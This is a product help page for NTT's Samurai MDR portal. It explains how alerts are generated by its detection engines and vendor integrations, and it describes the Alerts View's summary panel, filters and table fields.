This is the multi-page printable view of this section. Click here to print.

Return to the regular view of this page.

Alerts

What is an alert?

An alert is a security detection made by the Samurai platform or third party vendor where Samurai is ingesting telemetry.

How are alerts triggered?

Alerts are triggered by detection engines based on single or multiple events. The Samurai MDR portal displays alerts categorized according to the underlying detection engine. These categories include:

  • Samurai platform

    • Real-time engine - Proprietary NTT developed detection engine that leverages behaviour modeling, machine learning, and the latest threat research to automatically identify suspected threats during real-time analysis of ingested telemetry into the Samurai platform.
    • Hunting engine - Intelligence-driven detection engine based on the Sigma project but customized by NTT with additional detection capabilities. The Samurai hunting engine performs automated threat hunting to idenfiy and alert on possible adversary activity.
  • Vendor

    • Alerts generated by and collected from third-party vendor technologies which are integrated with the Samurai platform (e.g Endpoint Detection & Response (EDR) and Firewall technologies)

highlight.png We are working on additional documentation which will walk through the Samurai platform concepts and usage in more depth so look out for updates!

What alerts are displayed within the Samurai MDR portal?

We display the same alerts as our Samurai Security Operation Centre (SOC) analysts view.

Do I need to review and act on alerts?

No. The Samurai SOC analysts triage, investigate and validate alerts as part of your Managed Detection & Response (MDR) service. As alerts are validated by the Samurai SOC analysts and investigated, they may potentially lead to a reported Security Incident and are marked accordingly. Our strategy includes visibility and transparency of the service we provide to you therefore this feature provides you that visibility showcasing the value of the service. Refer to the Alert Dashboard which provides some key alert metrics over a given time period.

Next Steps

To further understand Alerts within the Samurai MDR portal we recommend you review the Alerts View article.

1 - Alerts View

In this article, all elements of the Alert View are outlined to help you understand the alerts displayed.

  1. Login to the Samurai MDR portal
  2. Click Analysis and select Alerts on the main menu

Figure 1: Alert view example

Alerts Summary

Alerts are summarized in a panel which can be updated based on a specified time period and includes:

  • Security Incidents - the total number of security incidents reported to you that may correspond to one or more alerts.
  • Alerts - the total number of alerts detected by the Samurai platform and third party vendor integrated with the Samurai platform.
  • Real-time engine - the total number of alerts detected by the Samurai real-time engine
  • Hunting engine - the total number of alerts detected by the Samurai hunting engine
  • Vendor - the total number of alerts collected from third-party vendor products integrated with the Samurai platform

Figure 2: Alerts summary example

Filters

Various filters are available to determine the alerts to be displayed.

Figure 3: Time and Display filter

The total number of alerts within the alerts table in displayed to the left of the Time Period filter.

Time period

You can update all panels to specific date and time ranges. We default to the Last 24 hours however have included Quick time ranges.

Figure 4: Date and time selection

Display Filter

Enter any values you wish to filter and highlight within the display filter.

Figure 5: Display filter

Alert Column Filter

Adjust and show/hide any of the column values within the Alert Table.

Figure 6: Alert column filter

Alerts Table

All alerts are listed within the alert table, important to note is that the table is limited to 10,000 alerts therefore apply filters to narrow the results.

What are the Alert table fields?

Review the table below outlining each field displayed:

Alert fieldDescription
TimestampLocal date and time of when the alert was generated displayed in the format [yyyy:mm:dd] [hh:mm:ss], hover over will display Universal Time Coordinated (UTC) and local timezone offset
IncidentIf the alert is associated with a reported security incident (one or more alerts may be associated with a single security incident) a link to the security incident is displayed
ActionAction relates to the parsed action in the underlying event(s)
SignatureSignature name from the detecting engine - this could be from an integrated telemetry source (vendor) or from a Samurai platform detection engine
SourceInitiating source, this could be represented as hostname(s), IP address, user or URL
Source PortThe initiating source port
DestinationThe destination, this could be represented as hostname(s), IP address, user or URL
Destination PortDestination port number
ProtocolNetwork protocol e.g TCP / UDP
UserUser from the underlying event(s)
MITREThe MITRE ATT&CK tactic mapping - this could include one or more tactics. For further information refer to ATT&CK Matric for Enterprise
DetectionThe detection engine triggering the alert. Refer to How are alerts triggered?
IDAlert ID (not displayed by default)

If MULTI is displayed in any of the fields it denotes multiple entries e.g multiple destinations are represented as MULTI. Some fields may also be blank if the Samurai platform does not have the underlying data.